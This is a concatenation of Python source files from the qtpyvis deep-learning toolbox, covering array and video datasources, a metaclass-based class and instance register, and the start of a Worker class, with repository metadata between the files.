from .datasource import Labeled, Indexed
class DataArray(Indexed):
# pylint: disable=too-many-ancestors
"""A ``DataArray`` stores all entries in an array (like the MNIST
character data). That means that all entries will have the same sizes.
Attributes
----------
_array: np.ndarray
An array of input data. Can be ``None``.
"""
def __init__(self, array: np.ndarray = None, description: str = None,
**kwargs):
"""Create a new DataArray
Parameters
----------
array: np.ndarray
Numpy data array
description: str
Description of the data set
"""
super().__init__(**kwargs)
self._array = array
self._description = description
def __len__(self):
return 0 if self._array is None else len(self._array)
def __str__(self):
shape = None if self._array is None else self._array.shape
return f'<DataArray "{shape}">'
def _get_description(self, index: int = None, **kwargs) -> str:
"""Provide a description of the Datasource or one of its
elements.
Attributes
----------
index: int
Provide a description of the datapoint for that index.
"""
description = super()._get_description(**kwargs)
if index is not None:
description = 'Image ' + str(index) + ' from ' + description
return description
#
# Preparation
#
def _prepared(self) -> bool:
"""A :py:class:`DataArray` is prepared once the array
has been initialized.
"""
return super()._prepared() and (self._array is not None)
def _unprepare(self) -> None:
"""A :py:class:`DataArray` is reset in an unprepared state
by releasing the array.
"""
self._array = None
super()._unprepare()
#
# Data
#
def _get_meta(self, data: Data, **kwargs) -> None:
# pylint: disable=arguments-differ
"""Get data from this :py:class:`Datasource`\\ .
"""
data.add_attribute('shape', value=self._array.shape[1:])
super()._get_meta(data, **kwargs)
def _get_batch(self, data: Data, index: int = None, **kwargs) -> None:
# pylint: disable=arguments-differ
if index is not None:
data.array = self._array[index:index+len(data)]
super()._get_batch(data, index=index, **kwargs)
def _get_index(self, data: Data, index: int, **kwargs) -> None:
data.array = self._array[index]
super()._get_index(data, index, **kwargs)
class LabeledArray(DataArray, Labeled):
# pylint: disable=too-many-ancestors
"""An array with labels for its entries.
Attributes
----------
_labels: np.ndarray
An array mapping indices (of the data array) to (numeric) labels.
"""
_labels: np.ndarray = None
@property
def labels_prepared(self) -> bool:
"""Check if labels for this dataset have been prepared.
"""
return self._labels is not None
def _prepare_labels(self, labels: np.ndarray = None) -> None:
"""Set the labels for for this labeled Array datasource.
Arguments
---------
labels: np.ndarray
An array containing the labels for this datasource. Should
have the same length as the data array.
"""
if labels is None:
raise ValueError("You have to provide a labels array when "
"preparing a LabeledArray.")
if len(self) != len(labels):
raise ValueError("Wrong number of target values: "
f"expect={len(self)}, got={len(labels)}")
self._labels = labels
def _set_labels(self, labels: np.ndarray,
scheme: ClassScheme = None) -> None:
"""Set the labels for this :py:class:`LabeledArray`. The labels
will be stored as numpy array, allowing for some of the
convenient numpy indexing techniques.
Arguments
---------
labels:
The labels for this :py:class:`LabeledArray`. Depending
on the type of datasource, this could be (numeric) class
indices, but could also be other kind of labels, like
list of bounding boxes. The crucial point is that there
should be one label for each data point in the datasource,
and the order of labels has to correspond to the order
of datapoints.
scheme:
If not `None`, `labels` are considered as class labels,
that is identifiers of classes in that :py:class:`ClassScheme`.
Such labels will be stored as an numpy array of
:py:class:`ClassIdentifier`.
"""
if scheme is None:
self._labels = labels
else:
self._scheme = scheme
self._labels = np.empty(len(self._lfw_people.target), dtype=object)
for index, label in enumerate(labels):
self._labels[index] = \
ClassIdentifier(label, scheme=scheme)
def _get_meta(self, data: Data, **kwargs) -> None:
"""Get data from this :py:class:`Datasource`\\ .
"""
data.add_attribute('label', batch=True)
super()._get_meta(data, **kwargs)
def _get_batch(self, data: Data, **kwargs) -> None:
"""Get data from this :py:class:`Datasource`\\ .
"""
super()._get_batch(data, **kwargs)
data.label = self._labels[data.index] if self.labels_prepared else None
def _get_index(self, data, index: int, **kwargs) -> None:
"""
Raises
------
IndexError:
The index is out of range.
"""
super()._get_index(data, index, **kwargs)
label = self._labels[index] if self.labels_prepared else None
data.label = label
def _get_description(self, index: int = None, short: bool = False,
with_label: bool = False, **kwargs) -> str:
# pylint: disable=arguments-differ
"""Provide a description of the Datasource or one of its
elements.
Attributes
----------
index: int
In case of an indexed Datasource, provide a description
of the given element.
"""
if index and with_label:
description = super()._get_description(index=index, **kwargs)
if not short:
if self.labels_prepared:
description += " with label {self._labels[index]}"
else:
description += ", no label available"
else:
description = super()._get_description(with_label=with_label,
**kwargs)
return description
| {
"repo_name": "Petr-By/qtpyvis",
"path": "dltb/datasource/array.py",
"copies": "1",
"size": "7425",
"license": "mit",
"hash": -9157966182380185000,
"line_mean": 32.5972850679,
"line_max": 79,
"alpha_frac": 0.5663299663,
"autogenerated": false,
"ratio": 4.324403028538148,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5390732994838148,
"avg_score": null,
"num_lines": null
} |
"""A :py:class:`Datasource` reading frames from a video.
"""
# standard imports
import logging
# thirdparty imports
import numpy as np
# toolbox imports
from dltb.base.video import Reader
from dltb.base.data import Data
from .datasource import Imagesource, Imagesourcelike, Indexed, Livesource
# logging
LOG = logging.getLogger(__name__)
# FIXME[error]: when looping over the end of the video, the
# loop continues but raises errors:
class Video(Indexed, Imagesource, Livesource):
# pylint: disable=too-many-ancestors
"""A data source fetching frames from a video.
Attributes
----------
_backend:
The VideoBackend use for accessing the video file.
_filename:
The filename frome which the video is read.
_frame:
The currently fetched frame.
If the frame changes, Observers of this :py:class:`Video`
will receive a `data_changed` notification.
"""
def __init__(self, filename: str, **kwargs):
"""Create a new DataWebcam
"""
super().__init__(**kwargs)
self._filename = filename
self._backend = None
self._frame = None
self._description = "Frames from the video \"{}\"".format(filename)
def __str__(self):
return 'Movie'
#
# Preparable
#
def _prepared(self) -> bool:
"""Report if this Datasource is prepared for use.
A Datasource has to be prepared before it can be used.
"""
return super()._prepared() and (self._backend is not None)
def _prepare(self) -> None:
"""Prepare this Datasource for use.
"""
super()._prepare()
self._backend = Reader(filename=self._filename)
self._loop_interval = 1. / self._backend.frames_per_second
def _unprepare(self) -> None:
"""Unprepare this Datasource. This will free resources but
the webcam can no longer be used. Call :py:meth:`prepare`
to prepare the webcam for another use.
"""
if self._backend:
del self._backend
self._backend = None
self._frame = None
super()._unprepare()
#
# Data
#
def _get_meta(self, data: Data, **kwargs) -> None:
# pylint: disable=arguments-differ
"""Get metadata for some data.
"""
data.add_attribute('frame', batch=True) # usually the same a index
data.add_attribute('time', batch=True)
super()._get_meta(data, **kwargs)
def _get_frame_at(self, data: Data, time: float):
"""Fetch a video frame at a given timepoint from this
:py:class:`Video`.
Arguments
---------
time: float
The temporal position (point in time) of the frame
to fetch in seconds (fractions may be given).
"""
data.array = self._backend.get_frame_at(time)
data.index = self._backend.frame
def _get_data(self, data: Data, frame: int = None, time: float = None,
index: int = None, **kwargs) -> None:
# pylint: disable=arguments-differ
if frame is not None and not data:
data.datasource_argument = 'frame'
data.datasource_value = frame
index = frame
elif time is not None and not data:
data.datasource_argument = 'time'
data.datasource_value = time
index = self._backend.frame_at(time)
super()._get_data(data, index=index, **kwargs)
def _get_default(self, data: Data, **kwargs) -> None:
"""The default is to obtain the next frame from the video.
"""
self._get_index(data, index=None, **kwargs) # get next frame
def _get_snapshot(self, data, snapshot: bool = True, **kwargs) -> None:
"""Reading a sanpshot from the video means reading the next frame.
Arguments
---------
snapshot: bool
If True, try to make sure that we get a current snapshot.
On some systems, the video driver buffers some frame, so that
reading just reading the frame may result in outdated data and
one should first empty the buffer before reading the data.
"""
LOG.debug("Video._get_data(snapshot=%r)", snapshot)
self._get_index(data, index=None, **kwargs) # get next frame
def _get_index(self, data: Data, index: int, **kwargs) -> None:
"""Implementation of the :py:class:`Indexed` datasource interface.
The index will be interpreted as frame number.
Arguments
---------
index: int
The frame number of the frame to fetch from the video.
If no frame is given, the next frame of the video will
be fetched (advancing the frame number by 1).
"""
data.array = self._backend[index]
data.frame = self._backend.frame
data.index = index or data.frame
data.time = self._backend.time
#
# Public Video API
#
@property
def frame(self) -> int:
"""The current frame of this video.
The next frame read will be frame + 1.
"""
return self._backend.frame
@property
def time(self) -> float:
"""The current frame time of this video.
"""
return self._backend.time
@property
def frames_per_second(self) -> float:
"""Frames per second for this video.
"""
return self._backend.frames_per_second
#
# Implementation of the 'Indexed' API
#
def __len__(self) -> int:
"""The length of a video is the number of frames it is composed of.
"""
if not self.prepared:
raise RuntimeError("Applying len() to unprepare Video object.")
return len(self._backend)
class Thumbcinema(Reader):
"""A video :py:class:`Reader` that uses an `Imagesource` to produce
a sequence of frames.
>>> reader = Thumbcinema(Datasource['imagenet'])
# FIXME[todo]
>>> reader = Thumbcinema('imagenet')
"""
def __init__(self, source: Imagesourcelike) -> None:
self._source = Imagesource.as_imagesource(source)
def __enter__(self) -> Reader:
self._source.prepare()
self._iterator = iter(self._source)
self._count = 0
return super().__enter__()
def __next__(self) -> np.ndarray:
"""Implementation of the :py:class:`Iterator` interface.
"""
if self._count > 600 and self._count < 800:
print(self._count)
self._count += 1
image = next(self._iterator)
import sys
if image.index > 600 and image.index < 800:
print(image.index, image.array.shape, image.filename, file=sys.stderr)
return image.array
| {
"repo_name": "Petr-By/qtpyvis",
"path": "dltb/datasource/video.py",
"copies": "1",
"size": "6766",
"license": "mit",
"hash": 3320269411752227300,
"line_mean": 30.3240740741,
"line_max": 82,
"alpha_frac": 0.5885308897,
"autogenerated": false,
"ratio": 4.1281269066503965,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.000055778670236501566,
"num_lines": 216
} |
"""A :py:class:`Register` is basically an :py:class:`Observable` container,
that notifies its :py:class:`Observer`s when entries are registered or
unregistered.
"""
# Generic imports
from abc import ABCMeta, abstractmethod
from typing import Iterator, Tuple, Union
import importlib
import logging
# Toolbox imports
from .observer import Observable
from .busy import BusyObservable, busy
from .prepare import Preparable
from .fail import Failable
from ..util.debug import debug_object
from ..thirdparty import check_module_requirements
# Logging
LOG = logging.getLogger(__name__)
class Registrable(metaclass=ABCMeta):
# pylint: disable=too-few-public-methods
"""A :py:class:`Registrable` is an object that may be put into a
:py:class:`Register`. This basically mean that it has a unique key
(accessible via the :py:attr:`key` property).
Attributes
----------
key: str
A (supposed to be unique) key for the new instance.
"""
@property
@abstractmethod
def key(self):
"""Get the "public" key used to identify this entry in a register. The
key is created upon initialization and should not be changed
later on.
"""
# to be implemented by subclasses
class RegisterEntry(Registrable, debug_object):
# pylint: disable=too-few-public-methods
"""A :py:class:`RegisterEntry` is a base class for
:py:class:`Registrable` objects. It realizes the :py:attr:`key`
property by storing the key value as private property.
Attributes
----------
_key: str
A (supposed to be unique) key for the new instance.
Class Attributes
----------------
_key_counter: int
A counter for generating unique keys.
"""
_key_counter = 0
def __init__(self, *args, key: str = None, **kwargs) -> None:
"""Iniitalization of a :py:class:`RegisterEntry`. This will
ensure that the object has a key.
"""
super().__init__(*args, **kwargs)
self._key = key or self._generate_key()
LOG.debug("RegisterEntry: init instance of class %s with key '%s'",
type(self).__name__, self.key)
def _generate_key(self) -> str:
"""Generate a key.
"""
type(self)._key_counter += 1
return type(self).__name__ + str(self._key_counter)
@property
def key(self):
"""Get the "public" key used to identify this entry in a register. The
key is created upon initialization and should not be changed
later on.
"""
return self._key
class Register(Observable, method='register_changed',
changes={'entry_added', 'entry_changed', 'entry_removed'}):
"""
**Changes**
'entry_added':
A new entry was added to this :py:class:`Register`.
'entry_changed'
A register entry has changed.
'entry_removed':
A key was remove from this :py:class:`Register`.
"""
def __init__(self, **kwargs) -> None:
super().__init__(**kwargs)
self._entries = {}
def add(self, entry: Registrable) -> None:
"""Add a new entry to this :py:class:`Register`
"""
key = entry.key
self._entries[key] = entry
self.register_change(key, 'entry_added')
def remove(self, entry: Registrable) -> None:
"""Remove an entry from this :py:class:`Register`
"""
key = entry.key
del self._entries[key]
self.register_change(key, 'entry_removed')
#
# The Container[Registrable] protocol
#
def __contains__(self, entry: Union[str, Registrable]) -> bool:
"""Check if the given entry is registered.
Argument
--------
entry: Union[str, Registrable]
Either the entry or the key.
"""
return ((entry.key if isinstance(entry, Registrable) else entry)
in self._entries)
#
# The Sized protocol
#
def __len__(self) -> int:
"""The number of entries in this register.
"""
return len(self._entries)
#
# The Iterable interface
#
def __iter__(self) -> Iterator[Registrable]:
"""Iterate the entries registered in this :py:class:`Register`.
"""
return map(lambda item: item[1], self._entries.items())
#
# item access
#
def __getitem__(self, key: str) -> Registrable:
"""Lookup the entry for the given key in this :py:class:`Register`.
"""
return self._entries[key]
def keys(self, **kwargs) -> Iterator[str]:
"""Ieterate the keys of the entries registered
in this :py:class:`Register`.
"""
return map(lambda entry: entry.key, self.entries(**kwargs))
def entries(self) -> Iterator[str]:
"""Iterate the entries of this :py:class:`Register`.
"""
return iter(self)
def __iadd__(self, entry: Registrable) -> None:
"""Add an new entry or change an existing entry
in this :py:class:`Register`
"""
key = entry.key
self._entries[key] = entry
self.register_change(key, 'entry_added')
def __delitem__(self, entry: Union[str, Registrable]) -> None:
"""Remove an entry from this :py:class:`Register`
"""
key = entry if isinstance(entry, str) else entry.key
del self._entries[key]
self.register_change(key, 'entry_removed')
def register_change(self, key: str, *args, **kwargs) -> None:
"""Notify observers on a register change.
"""
changes = self.Change(*args, **kwargs)
LOG.debug("register change on %s: %s with key='%s'",
self, changes, key)
if not changes:
return
self.notify_observers(changes, key=key)
#
# The ClassRegister
#
class StatefulRegisterEntry(BusyObservable, Registrable, Failable,
method='entry_changed'):
"""Base class for observable register items
"""
@property
@abstractmethod
def initialized(self) -> bool:
"""A flag indicatining if the entry is initalized.
"""
class StatefulRegister(Register, StatefulRegisterEntry.Observer):
"""Base class for registers with stateful items.
"""
def add(self, entry: StatefulRegisterEntry) -> None:
# pylint: ignore
"""Add a new entry to this :py:class:`StatefulRegister`
"""
super().add(entry)
# 'busy_changed', state_changed
interests = StatefulRegisterEntry.Change('state_changed')
self.observe(entry, interests=interests)
def remove(self, entry: StatefulRegisterEntry) -> None:
"""Remove an entry from this :py:class:`StatefulRegister`
"""
self.unobserve(entry)
super().remove(entry)
def entry_changed(self, entry: StatefulRegisterEntry,
_change: StatefulRegisterEntry.Change) -> None:
"""React to a change of the observed
:py:class:`StatefulRegisterEntry`. Such a change will be
propagated to observers of the register.
"""
self.register_change(entry.key, 'entry_changed')
def entries(self, initialized: bool = None) -> Iterator[Registrable]:
# pylint: disable=arguments-differ
"""Iterate the entries of this register.
"""
return (super().entries() if initialized is None else
filter(lambda entry: initialized is entry.initialized,
super().entries()))
#
# The ClassRegister
#
class ClassRegisterEntry(StatefulRegisterEntry):
"""A :py:class:`ClassRegisterEntry` represents information that
can be used to import a class. This includes module and class.
"""
def __init__(self, module_name: str = None, class_name: str = None,
cls: type = None, **kwargs) -> None:
"""
Arguments
---------
module_name: str
Fully qualified Module name.
class_name: str
Class name, either short or fully qualified
(including module name). In the latter case, no module
name has to be provided.
cls: type
The instantiated class object. If given, `module_name`
and `class_name` will be determined automatically and
do not have to be provided.
"""
super().__init__(**kwargs)
if not (module_name and class_name) and cls is None:
raise ValueError("Provide either module and class name or class "
"for ClassRegisterEntry")
if cls is not None:
module_name, class_name = cls.__module__, cls.__name__
elif module_name is None and '.' in class_name:
module_name, class_name = class_name.rsplit('.', maxsplit=1)
self.cls = cls
self.module_name = module_name
self.class_name = class_name
def __str__(self) -> str:
"""String representation of this :py:class:`ClassRegisterEntry`
"""
info = f"class {self.module_name}.{self.class_name}: "
info += f"initialized={self.initialized}"
if not self.initialized:
info += f" ({'' if self.initializable else 'not '} initializable)"
return info
@property
def key(self):
"""The unique key identifying a class is the canonical (full)
class name (including the module name).
"""
return self.module_name + '.' + self.class_name
@property
def initializable(self) -> bool:
"""Check if this :py:class:`ClassRegisterEntry` can be initialized.
Some classes may not be initializable due to unfulfilled requirements
(like Python modules that have not been installed).
"""
return self.initialized or check_module_requirements(self.module_name)
@property
def initialized(self) -> bool:
"""Check if the class represented by this Entry has been
initialized.
"""
return self.cls is not None
@busy("Initializing class")
def initialize(self) -> None:
"""Initialize this class. This essentially means to load
the module holding the class definition.
"""
if self.cls is not None:
return # Nothing to do
message = (f"Initialization of class '{self.class_name}' "
f"from module {self.module_name}")
with self.failure_manager(logger=LOG, message=message):
module = importlib.import_module(self.module_name)
self.cls = getattr(module, self.class_name)
class ClassRegister(StatefulRegister):
"""A register for :py:class:`ClassRegisterEntry`s.
"""
def __init__(self, base_class: type = None, **kwargs) -> None:
if base_class is None:
raise ValueError("No base class was provided "
"for the new ClassRegister.")
super().__init__(**kwargs)
self._base_class = base_class
@property
def base_class(self) -> type:
"""The base class of this :py:class:`ClassRegister`.
All classes registered have to be subclasses of this base class.
"""
return self._base_class
def __getitem__(self, key: Union[str, type]) -> Registrable:
"""Lookup the entry for the given key in this :py:class:`Register`.
"""
if isinstance(key, type):
key = f"{key.__module__}.{key.__name__}"
return super().__getitem__(key)
def initialized(self, full_name: str) -> bool:
"""Check if a given class is initialized.
"""
return full_name in self and self[full_name].initialized
def new_class(self, cls: type) -> None:
"""Add a new class to this :py:class:`ClassRegisterEntry`.
If there is already a :`ClassRegisterEntry` for this class,
it will be updated, otherwise a new one will be created.
"""
key = cls.__module__ + '.' + cls.__name__
if key in self:
self[key].cls = cls
self.register_change(key, 'entry_changed')
else:
self.add(ClassRegisterEntry(cls=cls))
class InstanceRegister(StatefulRegister):
"""A register for :py:class:`InstanceRegisterEntry`s.
"""
def __init__(self, base_class: type = None, **kwargs) -> None:
if base_class is None:
raise ValueError("No base class was provided "
"for the new InstanceRegister.")
super().__init__(**kwargs)
self._base_class = base_class
@property
def base_class(self) -> type:
"""The base class of this register. All instances registered
have to be instances of this class (or one of its subclasses).
"""
return self._base_class
class InstanceRegisterEntry(StatefulRegisterEntry, RegisterEntry):
"""A :py:class:`InstanceRegisterEntry` represents information that
can be used to create an object. This includes module and
class name as well as initialization parameters.
"""
def __init__(self, key: str = None, obj: object = None,
cls: type = None, class_entry: ClassRegisterEntry = None,
args=(), kwargs=None, **_kwargs) -> None:
# pylint: disable=too-many-arguments
# too-many-arguments:
# It is fine to give all these arguments here, as they
# are used to initialize one record of (initialization)
# information.
if key is None and obj is not None and isinstance(obj, Registrable):
key = obj.key
super().__init__(key=key, **_kwargs)
if key is None:
raise ValueError("No key provided for new InstanceRegisterEntry.")
if obj is not None:
if cls is None:
cls = type(obj)
elif cls is not type(obj):
raise TypeError(f"Type mismatch between class {cls} "
f"and object of type {type(obj)}.")
if cls is not None:
if class_entry is None:
class_entry = cls.class_register[cls]
elif class_entry is not cls.class_register[cls]:
raise TypeError("Type mismatch between class entry of "
f"type {class_entry.cls} and class {cls}.")
if class_entry is None:
raise ValueError("No class entry provided for "
"InstancRegisterEntry.")
self._class_entry = class_entry
self.obj = obj
self.args, self.kwargs = args, (kwargs or {})
def __str__(self) -> str:
"""String representation of this :py:class:`InstancRegisterEntry`.
"""
return f"{self.key}: {self._class_entry}"
@property
def key(self) -> str:
"""The unique key identifying a class is the canonical (full)
class name (including the module name).
"""
return self._key
@property
def cls(self) -> type:
"""The unique key identifying a class is the canonical (full)
class name (including the module name).
"""
return self._class_entry.cls
@property
def initializable(self) -> bool:
"""Check if this :py:class:`InstanceRegisterEntry` can be initialized.
Some keys may not be initializable due to unfulfilled requirements
(like Python modules that have not been installed).
"""
return self.initialized or self._class_entry.initializable
@property
def initialized(self) -> bool:
"""A flag indicating if this :py:class:`InstanceRegisterEntry`
is initialized (`True`) or not (`False`).
"""
return self.obj is not None and self.obj is not True
@busy("Initializing instance")
def initialize(self, prepare: bool = False) -> None:
# pylint: disable=arguments-differ
"""Initialize this :py:class:`InstanceRegisterEntry`.
When finished, the register observers will be informed on
`entry_changed`, and the :py:attr:`initialized` property
will be set to `False`.
"""
if self.obj is not None:
return # Nothing to do
# Initialize the class object
self._class_entry.initialize(busy_async=False)
message = (f"Initialization of InstanceRegisterEntry '{self.key}' "
f"from class {self._class_entry}")
with self.failure_manager(logger=LOG, message=message):
self.obj = self._class_entry.cls(*self.args, key=self.key,
**self.kwargs)
self.change('state_changed')
if prepare and isinstance(self.obj, Preparable):
self.obj.prepare()
@busy("Uninitializing instance")
def uninitialize(self) -> None:
"""Unitialize this :py:class:`InstanceRegisterEntry`.
When finished, the register observers will be informed on
`entry_changed`, and the :py:attr:`initialized` property
will be set to `False`.
"""
obj = self.obj
if obj is None:
return # nothing to do
self.obj = None
self.clean_failure()
self.change('state_changed')
del obj
@property
def register(self) -> InstanceRegister:
"""The instance register of the :py:class:`RegisterClass` to
which the object this :py:class:`InstanceRegisterEntry` belongs
to.
"""
return (None if self._entry_class.cls is None else
self._entry_class.cls.instance_register)
class RegisterClass(ABCMeta):
# pylint: disable=no-value-for-parameter
# no-value-for-parameter:
# we disable this warning as there is actually a bug in pylint,
# not recognizing `cls` as a valid first parameter instead
# of `self` in metaclasses, and hence taking cls.method as
# an unbound call, messing up the whole argument structure.
"""A metaclass for classes that allow to register subclasses and
instances.
Class attributs
---------------
A class assigned to this meta class will have the following
attributes (these are considered private properties of the class,
subject to change, that should be used outside the class):
instance_register: InstanceRegister
A InstanceRegister containing all registered keys for the class.
The register contains :py:class:`InstanceRegisterEntry`s
describing all registered instances, including all information
required for instantiation. If an instances has been instantiated,
`entry.obj` will be that instance.
class_register: ClassRegister
A ClassRegister containing all registered subclasses for
the classes. The register contains :py:class:`ClassRegisterEntry`s
describing all registered classes, including information
for import and initialization. If a class has been created,
`entry.cls` will be that class.
Subclasses are automatically added to the `class_register` upon
initialization, that is usually when the module defining the class
is imported. Instances are also automatically added upon
initialization. Instances are registered by a unique key (of type
`str`).
** Preregistering classes and instances **
It is also possible to preregister subclasses and instances.
Subclasses can be preregistered by calling
:py:meth:`register_class`. The idea of preregistering classes is
to specify requirements that have to be fulfilled in order
initialize (import) the class. This allows to filter out those
subclasses with unmet requirements. The actual instantiation
(import) of a class can be performed in a background thread by
calling `py:meth:`ClassRegisterEntry.initialize`.
Preregistering instances is done by the
:py:meth:`register_instance` method, providing the class name and
initialization parameters. Preregistering instances has mutliple
purposes. It allows to provide initialization arguments and
thereby store commonly used instances for fast access. As
registration is fast (no additional imports or data loading takes
place during registration), it can be done in the initialization
phase of the toolbox without significant performance effects (only
the abstract register base classes have to be imported). The
actual instantiation can be done in a background thread by calling
`py:meth:`InstancRegisterEntry.initialize`.
A registered instance can be accessed by its key using the expression
`Class[key]`. If not instantiated yet, the instance will be
created (synchronously).
"""
class RegisterClassEntry(RegisterEntry):
# pylint: disable=too-few-public-methods
"""A registrable object that generates keys from a register.
"""
def _generate_key(self) -> str:
# pylint: disable=no-member
return (self.__class__.__name__ + "-" +
str(len(self.instance_register)))
def __new__(mcs, clsname: str, superclasses: Tuple[type],
attributedict: dict, **class_parameters) -> None:
# pylint: disable=bad-mcs-classmethod-argument
"""A new class of the meta class scheme is defined.
If this is a new base class, we add new class and key
registers to that class.
Parameters
----------
clsname: str
The name of the newly defined class.
superclasses: str
A list of superclasses of the new class.
attributedict: dict
The attributes (methods and class attributes ) of the
newly defined class.
class_parameters:
Addition class parameters specificied in the class
definition.
"""
is_base_class = not any(issubclass(supercls, mcs.RegisterClassEntry)
for supercls in superclasses)
if is_base_class:
superclasses += (mcs.RegisterClassEntry, )
# class_parameters are to be processed by __init_subclass__()
# of some superclass of the newly created class ...
cls = super().__new__(mcs, clsname, superclasses, attributedict,
**class_parameters)
if is_base_class:
LOG.info("RegisterClass: new base class %s.%s",
cls.__module__, cls.__name__)
cls.base_class = cls
cls.instance_register = InstanceRegister(cls)
cls.class_register = ClassRegister(cls)
return cls
def __init__(cls, clsname: str, _superclasses: Tuple[type],
_attributedict: dict, **_class_parameters) -> None:
"""Initialize a class declared with this :py:class:`RegisterClass`.
This initialization will add a private class dictionary to
hold the registered instances of the class.
"""
# super().__init__(clsname, superclasses, **class_parameters)
super().__init__(clsname)
# add the newly initialized class to the class register
cls.class_register.new_class(cls)
def __call__(cls, *args, **kwargs) -> None:
"""A hook to adapt the initialization process for classes
assigned to a :py:class:`RegisterClass`.
This hook will automatically register all instances of that
class in the register. If no register key is provided,
a new one will be created from the class name.
"""
LOG.debug("RegisterClass: {cls.__name}.__call__({args}, {kwargs})")
new_entry = super().__call__(*args, **kwargs)
if 'key' in kwargs and new_entry.key != kwargs['key']:
LOG.warning("Key mismatch for new register entry: "
"should be '%s' but is '%s'",
kwargs['key'], new_entry.key)
# If the initialization has been invoked directly (not via
# Register.instance_register.initialize), we will register the
# new instance now.
if new_entry not in cls.instance_register:
entry = InstanceRegisterEntry(obj=new_entry,
args=args, kwargs=kwargs)
cls.instance_register.add(entry)
LOG.info("RegisterClass: new instance of class %s with key '%s'",
type(new_entry).__name__, new_entry.key)
return new_entry
#
# class related methods
#
def register_class(cls, name: str, module: str = None) -> None:
"""Register a (sub)class of the :py:class:`RegisterClass`'s
base class. These are the classes that upon initialization
will be registered at this :py:class:`RegisterClass`.
Subclasses of the base class will be automatically registered
once the module defining the class is imported. However, it
is possible to register classes in advance, allowing a user
interface to offer the initialization (import) of that class.
A class (registered or not) can be initialized by calling
:py:class:`initializa_class`.
Attributes
----------
name: str
The class name. Either the fully qualified name,
including the module name, or just the class name.
In the second case, the module name has to be provided
by the argument.
module: str
The module name. Only required if not provided as part
of the class name.
"""
full_name = name if module is None else ".".join((module, name))
if full_name not in cls.class_register:
if module is None:
module, name = name.rsplit('.', maxsplit=1)
entry = ClassRegisterEntry(module_name=module, class_name=name)
cls.class_register.add(entry)
#
# instance related methods
#
def register_instance(cls, key: str, module_name: str, class_name: str,
*args, **kwargs) -> None:
"""Register a key with this class. Registering a key will
allow to initialize an instance of a class (or subclass)
of this register.
Arguments
---------
key: str
The unique key to be registered with this class.
module_name: str
The module in which the class is defined.
class_name: str
The name of the class.
*args, **kwargs:
Arguments to be passed to the constructor when initializing
the key.
"""
if key in cls.instance_register:
raise ValueError(f"Duplcate registration of {cls.__name__}"
f"with key '{key}'.")
full_name = module_name + '.' + class_name
if full_name not in cls.class_register:
cls.register_class(full_name)
class_entry = cls.class_register[full_name]
entry = InstanceRegisterEntry(key=key, class_entry=class_entry,
args=args, kwargs=kwargs)
cls.instance_register.add(entry)
def __len__(cls):
return len(cls.instance_register)
def __contains__(cls, key) -> bool:
"""Check if a given key was registered with this class.
"""
return key in cls.instance_register
def __getitem__(cls, key: str) -> object:
"""Access the instantiated entry for the given key.
If the entry was not instantiated yet, it will be
instantiated now.
"""
if key not in cls:
raise KeyError(f"No key '{key}' registered for class "
f"{cls.instance_register.base_class}"
f"[{cls.__name__}]. Valid keys are: "
f"{list(cls.instance_register.keys())}")
entry = cls.instance_register[key]
if not entry.initialized:
entry.initialize(busy_async=False)
return entry.obj
def keys(cls) -> Iterator[str]:
"""Iterate keys of all registered instances.
"""
for key in cls.instance_register.keys():
yield key
#
# Debugging
#
def debug_register(cls):
"""Output debug information for this :py:class:`RegisterClass`.
"""
print(f"debug: register {cls.__name__} ")
print(f"debug: {len(cls.class_register)} registered subclasses:")
for i, entry in enumerate(cls.class_register):
print(f"debug: ({i+1}) {entry.key}: "
f"initialized={entry.initialized}")
print(f"debug: {len(cls.instance_register)} registered instances:")
for i, entry in enumerate(cls.instance_register):
print(f"debug: ({i+1}) {entry.key}: "
f"initialized={entry.initialized}")
| {
"repo_name": "Petr-By/qtpyvis",
"path": "dltb/base/register.py",
"copies": "1",
"size": "28888",
"license": "mit",
"hash": -4288238697875908600,
"line_mean": 35.0649188514,
"line_max": 79,
"alpha_frac": 0.6031570202,
"autogenerated": false,
"ratio": 4.41442542787286,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 801
} |
"""A :py:class:`Worker` is intended for (asynchronously) using
a :py:class.`Tool`.
"""
# standard imports
import logging
# toolbox imports
from ..base.busy import BusyObservable, busy
from ..base.data import Data
from .tool import Tool
# logging
LOG = logging.getLogger(__name__)
class Worker(BusyObservable, Tool.Observer, method='worker_changed',
changes={'tool_changed', 'data_changed',
'work_step', 'work_finished'}):
"""A worker can be used to work on data using a :py:class:`Tool`.
The worker will hold a data object to which the tool is
applied. The results are stored as new attributes of that data
object.
Working can be done asynchronously. The worker is observable
and will notify observers on the progress. All workers post
the following notifications:
data_changed:
The data for working was changed. The underlying tool
has started working on the data, but it may not have finished
yet. However, the :py:attr:`data` property will already
provide the new :py:class:`Data` object.
tool_changed:
The :py:class:`Tool` to be used for working was changed.
work_step:
A work step was done. This will only happen, if the tool
is an :py:class`IterativeTool` and that `stepwise=True`
argument has been given. More fine grained tracking
of the work process can be obtained by observing the
:py:class:`Data` object itself.
work_finished:
The work was finished. The data object will now contain
the results.
"""
def __init__(self, tool: Tool = None, **kwargs) -> None:
super().__init__(**kwargs)
self._data = None
self._next_data = None
self._tool = tool
LOG.info("New Worker created: %r (tool=%s)", self, tool)
@property
def data(self):
"""The :py:class:`Data` structure used by the worker.
This data will contain results in specific attributes,
depending on the tool used and its configuration.
The data also includes the `duration` (in seconds).
"""
return self._data
@property
def tool(self) -> Tool:
"""The :py:class:`Tool` applied by this :py:class:`Worker`."""
return self._tool
@tool.setter
def tool(self, tool: Tool) -> None:
"""Change the :py:class:`Tool` to be applied by this
:py:class:`Worker`.
"""
LOG.info("Tool changed from %s to %s for worker %r",
self._tool, tool, self)
if tool is not self._tool:
if self._tool is not None:
self.unobserve(self._tool)
self._tool = tool
if tool is not None:
self.observe(tool, Tool.Change('tool_changed'))
self.change('tool_changed')
if self._data is not None:
self.work(self._data) # rework the current data with new tool
@property
def ready(self) -> bool:
"""Check if this worker is ready for use.
"""
return self._ready()
def _ready(self) -> bool:
# FIXME[todo/states]: self.tool.ready
return (self.working or
(self._tool is not None and
self._tool.prepared and
(not isinstance(self.tool, BusyObservable) or
not self.tool.busy)))
@property
def working(self) -> bool:
"""Check if this worker is currently working on data.
"""
return self._next_data is not None
def work(self, data: Data, **kwargs) -> None:
"""Run a data work loop. This will set the Worker
into a busy state ("working"), in which new input data
